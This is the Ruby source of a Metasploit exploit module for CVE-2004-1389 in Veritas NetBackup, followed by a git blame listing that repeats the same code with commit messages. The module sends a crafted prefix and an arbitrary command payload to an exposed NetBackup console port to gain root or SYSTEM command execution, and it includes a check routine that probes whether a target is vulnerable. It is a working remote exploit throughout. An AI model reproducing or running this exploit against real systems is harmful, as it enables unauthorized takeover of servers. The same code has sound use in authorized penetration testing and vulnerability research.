modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'VERITAS NetBackup Remote Command Execution',
      'Description'    => %q{
          This module allows arbitrary command execution on an
        ephemeral port opened by Veritas NetBackup, whilst an
        administrator is authenticated. The port is opened and
        allows direct console access as root or SYSTEM from
        any source address.
      },
      'Author'         => [ 'aushack' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2004-1389' ],
          [ 'OSVDB', '11026' ],
          [ 'BID', '11494' ]
        ],
      'Privileged'     => true,
      'Platform'       => %w{ linux unix win },
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'Space'    => 1024,
          'BadChars' => '',
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl telnet',
            }
        },
      'Targets'        =>
        [
          ['Automatic', { }],
        ],
      'DisclosureDate' => '2004-10-21',
      'DefaultTarget' => 0))
  end

  def check
    connect

    sploit = rand_text_alphanumeric(10)
    buf = "\x20\x20\x201\x20\x20\x20\x20\x20\x201\necho #{sploit}\n"

    sock.put(buf)
    banner = sock.get_once

    disconnect

    if banner.to_s.index(sploit)
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    connect

    sploit = payload.encoded.split(" ")

    buf = "\x20\x20\x201\x20\x20\x20\x20\x20\x201\n"
    buf << payload.encoded
    buf << "\n"

    sock.put(buf)
    res = sock.get_once

    print_status(res.to_s)

    handler
    disconnect
  end
end
Added veritas_netbackup_cmdexec module. 2008-11-13 09:45:47 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Added veritas_netbackup_cmdexec module. 2008-11-13 09:45:47 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! 2009-12-06 05:50:37 +00:00			`Rank = ExcellentRanking`
Retab modules 2013-08-30 16:28:54 -05:00
fix some non-full-namespace includes 2010-10-09 06:55:52 +00:00			`include Msf::Exploit::Remote::Tcp`
Retab modules 2013-08-30 16:28:54 -05:00
Added veritas_netbackup_cmdexec module. 2008-11-13 09:45:47 +00:00			`def initialize(info = {})`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`super(update_info(info,`
Added veritas_netbackup_cmdexec module. 2008-11-13 09:45:47 +00:00			`'Name' => 'VERITAS NetBackup Remote Command Execution',`
			`'Description' => %q{`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`This module allows arbitrary command execution on an`
Added veritas_netbackup_cmdexec module. 2008-11-13 09:45:47 +00:00			`ephemeral port opened by Veritas NetBackup, whilst an`
			`administrator is authenticated. The port is opened and`
			`allows direct console access as root or SYSTEM from`
			`any source address.`
			`},`
Change author name to nick. 2017-11-09 03:00:24 +11:00			`'Author' => [ 'aushack' ],`
Added veritas_netbackup_cmdexec module. 2008-11-13 09:45:47 +00:00			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
			`[ 'CVE', '2004-1389' ],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '11026' ],`
Remove bad references (dead links) 2015-10-27 12:41:32 -05:00			`[ 'BID', '11494' ]`
Added veritas_netbackup_cmdexec module. 2008-11-13 09:45:47 +00:00			`],`
			`'Privileged' => true,`
Prefer Ruby style for single word collections 2013-09-24 12:33:31 -05:00			`'Platform' => %w{ linux unix win },`
Added veritas_netbackup_cmdexec module. 2008-11-13 09:45:47 +00:00			`'Arch' => ARCH_CMD,`
			`'Payload' =>`
			`{`
			`'Space' => 1024,`
			`'BadChars' => '',`
			`'DisableNops' => true,`
Added a new set of match flags for cmd injection exploits (RequiredCmds). This reduces the number of 'bad' payloads listed for explot modules. A good example is disabling the netcat -e payloads for old Solaris exploits 2009-07-21 15:20:35 +00:00			`'Compat' =>`
			`{`
			`'PayloadType' => 'cmd',`
			`'RequiredCmd' => 'generic perl telnet',`
			`}`
Added veritas_netbackup_cmdexec module. 2008-11-13 09:45:47 +00:00			`},`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`'Targets' =>`
Added veritas_netbackup_cmdexec module. 2008-11-13 09:45:47 +00:00			`[`
			`['Automatic', { }],`
			`],`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2004-10-21',`
Added veritas_netbackup_cmdexec module. 2008-11-13 09:45:47 +00:00			`'DefaultTarget' => 0))`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Added veritas_netbackup_cmdexec module. 2008-11-13 09:45:47 +00:00			`def check`
			`connect`
Retab modules 2013-08-30 16:28:54 -05:00
Added veritas_netbackup_cmdexec module. 2008-11-13 09:45:47 +00:00			`sploit = rand_text_alphanumeric(10)`
			`buf = "\x20\x20\x201\x20\x20\x20\x20\x20\x201\necho #{sploit}\n"`
Retab modules 2013-08-30 16:28:54 -05:00
Added veritas_netbackup_cmdexec module. 2008-11-13 09:45:47 +00:00			`sock.put(buf)`
Fix bad use of sock.get() and check() implementations 2014-06-28 16:05:05 -05:00			`banner = sock.get_once`
Retab modules 2013-08-30 16:28:54 -05:00
Added veritas_netbackup_cmdexec module. 2008-11-13 09:45:47 +00:00			`disconnect`
Retab modules 2013-08-30 16:28:54 -05:00
Fix bad use of sock.get() and check() implementations 2014-06-28 16:05:05 -05:00			`if banner.to_s.index(sploit)`
Added veritas_netbackup_cmdexec module. 2008-11-13 09:45:47 +00:00			`return Exploit::CheckCode::Vulnerable`
			`end`
			`return Exploit::CheckCode::Safe`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Added veritas_netbackup_cmdexec module. 2008-11-13 09:45:47 +00:00			`def exploit`
			`connect`
Retab modules 2013-08-30 16:28:54 -05:00
Added veritas_netbackup_cmdexec module. 2008-11-13 09:45:47 +00:00			`sploit = payload.encoded.split(" ")`
Retab modules 2013-08-30 16:28:54 -05:00
Added veritas_netbackup_cmdexec module. 2008-11-13 09:45:47 +00:00			`buf = "\x20\x20\x201\x20\x20\x20\x20\x20\x201\n"`
			`buf << payload.encoded`
			`buf << "\n"`
Retab modules 2013-08-30 16:28:54 -05:00
Added veritas_netbackup_cmdexec module. 2008-11-13 09:45:47 +00:00			`sock.put(buf)`
Fix bad use of sock.get() and check() implementations 2014-06-28 16:05:05 -05:00			`res = sock.get_once`
Retab modules 2013-08-30 16:28:54 -05:00
Some variables don't need to be in a double-quote. 2012-03-17 20:37:42 -05:00			`print_status(res.to_s)`
Retab modules 2013-08-30 16:28:54 -05:00
Added veritas_netbackup_cmdexec module. 2008-11-13 09:45:47 +00:00			`handler`
			`disconnect`
			`end`
			`end`